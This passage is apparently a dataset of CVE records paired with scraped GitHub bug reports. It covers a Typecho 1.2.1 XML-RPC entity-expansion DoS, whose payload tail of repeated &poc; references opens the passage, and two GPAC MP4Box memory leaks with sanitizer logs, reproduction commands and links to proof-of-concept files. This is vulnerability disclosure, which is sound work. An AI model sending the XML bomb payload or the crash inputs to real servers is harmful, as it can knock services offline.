;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;</methodName> <params> <param><value>aa</value></param> <param><value>aa</value></param> </params> </methodCall> ``` ### 问题出现的环境 - 操作系统版本:Ubuntu 20.04 - Apache/NGINX 版本:Nginx 1.22.1 - 数据库版本:5.7.34 - PHP 版本:7.4 - Typecho 版本:1.2.1 - 浏览器版本:Chrome/114.0.5735.289 Safari/537.36
Typecho v1.2.1 XML Blowup Attack DoS vulnerability
https://api.github.com/repos/typecho/typecho/issues/1648/comments
0
2023-11-27T08:12:21Z
2024-01-23T10:30:18Z
https://github.com/typecho/typecho/issues/1648
2,011,731,209
1,648
5,791
CVE-2023-46871
2023-12-07T18:15:08.030
GPAC version 2.3-DEV-rev602-ged8424300-master in MP4Box contains a memory leak in NewSFDouble scenegraph/vrml_tools.c:300. This vulnerability may lead to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/ReturnHere/d0899bb03b8f5e8fae118f2b76888486" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2658" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/ReturnHere/d0899bb03b8f5e8fae118f2b76888486" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2658" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "373C4F43-207C-47CB-B454-BD90A52F0ECF", "versionEndExcluding": null, "versionEndIncluding": "2.3-dev-rev602-ged8424300-master", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2658
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/bug-reporting/ 1、version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev602-ged8424300-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2、platform uname -a Linux returnzero-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2 x86_64 x86_64 x86_64 GNU/Linux 3、Reproduce ./MP4Box -bt $poc 4、ASCAN ./MP4Box -bt '/home/returnzero/gpac/out/default/crashes/id:000000,sig:06,src:000008,time:167295,execs:4216,op:havoc,rep:6' [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type traI in parent moov [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 861217 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type traI in parent moov [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 861217 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [MP4 Loading] decoding sample 1 from track ID 8 failed Error loading scene: BitStream Not Compliant Error: BitStream Not Compliant ================================================================= ==3703==ERROR: LeakSanitizer: detected memory leaks Direct leak of 8 byte(s) in 1 object(s) allocated from: #0 0x7f0d974b4887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x7f0d95d38b3b in NewSFDouble scenegraph/vrml_tools.c:300 #2 0x7f0d95d38b3b in gf_sg_vrml_field_pointer_new scenegraph/vrml_tools.c:558 SUMMARY: AddressSanitizer: 8 byte(s) leaked in 1 allocation(s). 5、Impact This vulnerability allows a remote attacker to cause a denial of service on an affected gpac MP4Box. Exploiting this vulnerability requires user interaction, as the target must access a malicious page or open a malicious file. 6、poc https://github.com/ReturnHere/CrashReport/blob/main/id%5E%25000000%2Csig%5E%2506%2Csrc%5E%25000008%2Ctime%5E%25167295%2Cexecs%5E%254216%2Cop%5E%25havoc%2Crep%5E%256
Memory leaks in NewSFDouble scenegraph/vrml_tools.c:300
https://api.github.com/repos/gpac/gpac/issues/2658/comments
2
2023-10-23T06:39:49Z
2023-12-09T11:54:02Z
https://github.com/gpac/gpac/issues/2658
1,956,459,097
2,658
5,792
CVE-2023-48958
2023-12-07T18:15:08.130
gpac 2.3-DEV-rev617-g671976fcc-master contains memory leaks in gf_mpd_resolve_url media_tools/mpd.c:4589.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dr0v/1204f7a5f1e1497e7bca066638acfbf5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2689" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dr0v/1204f7a5f1e1497e7bca066638acfbf5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2689" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2689
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
1、Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2、ASAN Log [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 [DASH] Cannot compute default segment duration [DASH] AS#1 changed quality to bitrate 10 kbps - Width 1280 Height 720 FPS 30/1 (playback speed 1) [DASH] AS#2 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#3 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#4 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#5 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#6 changed quality to bitrate 120 kbps - Width 384 Height 208 FPS 30/1 (playback speed 1) [DASH] AS#7 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1) [DASH] AS#8 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] Segment duration unknown - cannot estimate current startNumber [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07) [DASH] Unable to resolve initialization URL: Bad Parameter Filter dashin failed to setup: Bad Parameter Filters not connected: fout (dst=crash24_dash.mpd:gpac:segdur=10000/1000:profile=full:!sap:buf=1500:!check_dur:pssh=v:subs_sidx=0) (idx=1) Arg segdur set but not used Arg profile set but not used Arg !sap set but not used Arg buf set but not used Arg !check_dur set but not used Arg pssh set but not used Arg subs_sidx set but not used Error DASHing file: Bad Parameter ================================================================= ==3766==ERROR: LeakSanitizer: detected memory leaks Direct leak of 50 byte(s) in 1 object(s) allocated from: #0 0x7f8f1245b9a7 in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:454 #1 0x7f8f112d489f in gf_mpd_resolve_url media_tools/mpd.c:4589 #2 0x7f8f11303e24 in gf_dash_resolve_url media_tools/dash_client.c:3447 SUMMARY: AddressSanitizer: 50 byte(s) leaked in 1 allocation(s). 3、Reproduction ./MP4Box -dash 10000 $poc 4、poc [crash24.zip](https://www.mediafire.com/file/1sbsks4tzvzf1r3/crash24.zip/file) 5、Impact This vulnerability is capable of causing crashes, or lead to dos. 6、 Env Linux dr0v-virtual-machine 6.2.0-36-generic https://github.com/gpac/gpac/issues/37~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 9 15:34:04 UTC 2 x86_64 x86_64 x86_64 GNU/Linux AFL++ 4.09a 7、Credit dr0v
LeakSanitizer: detected memory leaks in in gf_mpd_resolve_url media_tools/mpd.c:4589
https://api.github.com/repos/gpac/gpac/issues/2689/comments
0
2023-11-16T01:53:56Z
2023-11-16T10:21:02Z
https://github.com/gpac/gpac/issues/2689
1,995,888,449
2,689
5,793